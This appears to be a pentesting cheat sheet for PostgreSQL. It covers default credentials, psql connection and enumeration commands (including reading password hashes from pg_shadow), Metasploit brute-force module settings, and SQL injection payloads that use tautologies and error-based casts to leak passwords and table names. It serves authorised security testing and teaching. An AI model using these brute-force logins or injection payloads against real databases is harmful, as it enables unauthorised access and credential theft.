5432 - Pentesting PostgreSQL (default port 5432; psql is the command-line client)
Users (common default credentials - try these before any brute force)
user | pass |
---|---|
postgres | postgres |
postgres | password |
Connect (local)
sudo -u postgres psql                 # peer auth as the OS "postgres" account (Unix socket)
psql -U postgres -h 127.0.0.1         # force TCP so the "host" rules in pg_hba.conf (password auth) apply
Connect (remote)
psql -h $IP -U postgres -W postgres
psql -h $IP -U postgres -d <database>
psql -h <host> -p <port> -U postgres -W postgres <database>
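-- psql session. Backslash commands run in the client, SQL runs on the server.
-- psql does NOT treat '#' as a comment (it becomes an argument of the meta-command),
-- so notes are kept on their own '--' lines.
-- List databases
\list
-- Switch the connection to a database
\c <database>
-- List tables, views and sequences visible on the current search_path
\d
-- Roles with their attributes (look for Superuser / Create role / Create DB) and membership
\du+
-- Current role. "user" is an alias for current_user; session_user shows the login role
-- if SET ROLE is in effect. is_superuser tells you whether the rest of this list will work.
SELECT user;
SELECT current_user, session_user;
SELECT current_setting('is_superuser');
-- List schemas
SELECT schema_name, schema_owner FROM information_schema.schemata;
\dn+
-- List databases
SELECT datname FROM pg_database;
-- Read credentials (usernames + password hashes). Readable only by superusers;
-- pg_authid.rolpassword holds the same data. Hash formats: md5<hex> where the hex is
-- md5(password || username), or SCRAM-SHA-256$<iter>:<salt>$<StoredKey>:<ServerKey>.
SELECT usename, passwd FROM pg_shadow;
-- Procedural languages, whether they are trusted, and who may use them. An untrusted
-- language (plpythonu, plperlu, ...) plus the right to CREATE FUNCTION is a path to OS command execution.
SELECT lanname, lanpltrusted, lanacl FROM pg_language;
-- Installed / installable extensions (works on any PostgreSQL).
-- "SHOW rds.extensions" is Amazon RDS only and errors elsewhere with "unrecognized configuration parameter".
SELECT extname, extversion FROM pg_extension;
SELECT name, installed_version FROM pg_available_extensions;
SHOW rds.extensions;
-- \s prints the LOCAL psql client's history (~/.psql_history on the box you run psql from),
-- not what has been executed on the server. For server-side activity use pg_stat_activity;
-- other users' query text is visible only to superusers / pg_read_all_stats members.
SELECT pid, usename, datname, query FROM pg_stat_activity;
\s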
Enumeration
nmap
nmap -sV -p 5432 <IP>                         # service/version fingerprint
nmap -p 5432 --script pgsql-brute <IP>        # NSE credential brute force (noisy, every attempt is logged server-side)
metasploit - version
use auxiliary/scanner/postgres/postgres_version
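# Version fingerprint (comments in msf resource-file style, on their own lines).
# The module logs in with USERNAME/PASSWORD (module defaults are postgres/postgres) and reads
# the server version. With a bogus user and no password expect little more than confirmation
# that the port speaks the PostgreSQL protocol -- verify against the module source.
# 10.0.2.5 is a lab address; replace it.
set RHOSTS 10.0.2.5
set USERNAME hacker
unset PASSWORD
options
run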
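# Credential brute force. Every attempt is a real login: with log_connections enabled the
# target's log fills with failures, and a fail2ban-style filter may block you -- get sign-off first.
use auxiliary/scanner/postgres/postgres_login
set RHOSTS 10.0.2.5
# Try the empty password for every user as well
set BLANK_PASSWORDS true
# template1 exists on every install, so a failure is an authentication failure, not a missing database
set DATABASE template1
# Stop after the first valid pair per host to keep the noise down
set STOP_ON_SUCCESS true
# Bundled default credential lists (user:pass pairs, then usernames alone)
set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_userpass.txt
set USER_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt
options
run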
SQL Injection
basic
-- PostgreSQL payloads for a single-quoted string context (... WHERE col = 'x' ...).
-- PostgreSQL does not require a space after "--"; the trailing " x" is presumably just
-- padding so the comment survives trailing-whitespace stripping.
-- Boolean test: tautology, should return every row
x' or 1=1 -- x
-- Boolean test on a guessed column/value; adjust "username"/"admin" to the target schema
x' or (1=1 and username='admin') -- x
-- Boolean/blind probe via subquery: true only when "users" has exactly one row
x' or (1=1 and (SELECT count(*) FROM users) = 1) -- x
-- Error-based, stacked query: needs a client that sends multi-statement simple-protocol
-- queries (e.g. PHP pg_query, psycopg2 by default); fails under prepared statements /
-- the extended protocol. The CAST fails with 'invalid input syntax for type date: "<value>"',
-- leaking the first row's value whenever the error text reaches the response.
x'; SELECT CAST(password AS DATE) FROM users; -- x
-- Error-based: same trick, but json_agg packs every table name into one string so the
-- failing boolean cast leaks them all in a single error message
x'; SELECT cast(cast(json_agg(table_name) as varchar) as boolean) FROM information_schema.tables; -- x